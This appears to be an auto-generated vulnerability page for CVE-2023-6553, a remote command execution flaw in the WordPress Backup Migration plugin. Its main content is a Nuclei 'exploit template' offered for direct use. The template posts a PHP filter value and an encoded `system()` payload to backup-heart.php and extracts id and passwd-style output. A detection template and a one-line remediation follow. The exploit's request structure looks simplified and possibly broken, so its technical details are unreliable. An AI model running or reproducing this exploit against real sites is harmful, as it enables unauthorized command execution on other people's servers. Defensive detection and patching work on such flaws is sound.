[webapps] WordPress Backup Migration 1.3.7 - Remote Command Execution
CVE-2023-6553
Vulnerability
High · CVSS N/A

📋 Vulnerability Basics
| CVE | CVE-2023-6553 |
|---|---|
| Vulnerability type | Vulnerability |
| Affected versions | See original |
| Severity | High · CVSS N/A |
| Published | 2026-03-03 |
| Submitter | DANG |
| Source | Exploit-DB original ↗ |
⚔️ Nuclei Exploit Template
The following is an exploit template in standard Nuclei v3 format, which can be used directly for vulnerability verification:
```yaml
id: CVE-2023-6553-exploit

info:
  name: WordPress Backup Migration RCE Exploit
  author: yourname
  severity: critical
  description: Exploits Remote Command Execution in WordPress Backup Migration plugin <= 1.3.7 via PHP Filter Chain
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6553
    - https://www.exploit-db.com/exploits/52031
    - https://github.com/Chocapikk/CVE-2023-6553
  tags: wordpress,wp-plugin,rce,backup-migration
  classification:
    cve-id: CVE-2023-6553
    cwe-id: CWE-94

variables:
  cmd: 'id'

http:
  - raw:
      - |
        POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
        Host: {{Hostname}}
        Content-Dir: {{php_filter_payload}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        {{base64_encode(cmd)}}
    payloads:
      php_filter_payload: "php://filter/convert.base64-encode/resource=php://temp"

  - raw:
      - |
        POST /wp-content/plugins/backup-backup/includes/backup-heart.php HTTP/1.1
        Host: {{Hostname}}
        Content-Dir: php://filter/convert.base64-decode/resource=php://temp
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        {{base64('<?php system("{{cmd}}");?>')}}
    matchers:
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        regex:
          - '(uid=[0-9]+\([a-zA-Z0-9_]+\) gid=[0-9]+\([a-zA-Z0-9_]+\))'
          - '(root:[^:]+:[0-9]+:[0-9]+:.*)'
        group: 1
        internal: false
```

🔍 Nuclei Detection Template
The following is a vulnerability detection template, used to determine whether a target is affected:
```yaml
id: CVE-2023-6553-detection

info:
  name: WordPress Backup Migration Plugin Detection
  author: yourname
  severity: high
  description: Detects WordPress Backup Migration plugin version <= 1.3.7
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6553
    - https://www.exploit-db.com/exploits/52031
  tags: wordpress,wp-plugin,backup-migration

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt'
      - '{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php'
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Backup Migration'
          - 'backup-backup'
        condition: or
      - type: status
        status:
          - 200
    extractors:
      - type: regex
        part: body
        regex:
          - 'Stable tag: ([0-9.]+)'
          - 'Version ([0-9.]+)'
        group: 1

  - method: POST
    path:
      - '{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php'
    headers:
      Content-Dir: 'test'
    matchers:
      - type: status
        status:
          - 200
          - 500
        condition: or
      - type: word
        part: body
        words:
          - 'error'
          - 'success'
        condition: or
    matchers-condition: and
```

🛡️ Remediation
Upgrade to the vendor's latest security release.
📎 References
⚠️ This article is based on public vulnerability databases and is intended only as a reference for security research and defense. Generated: 2026-05-07 06:52 | Source: Exploit-DB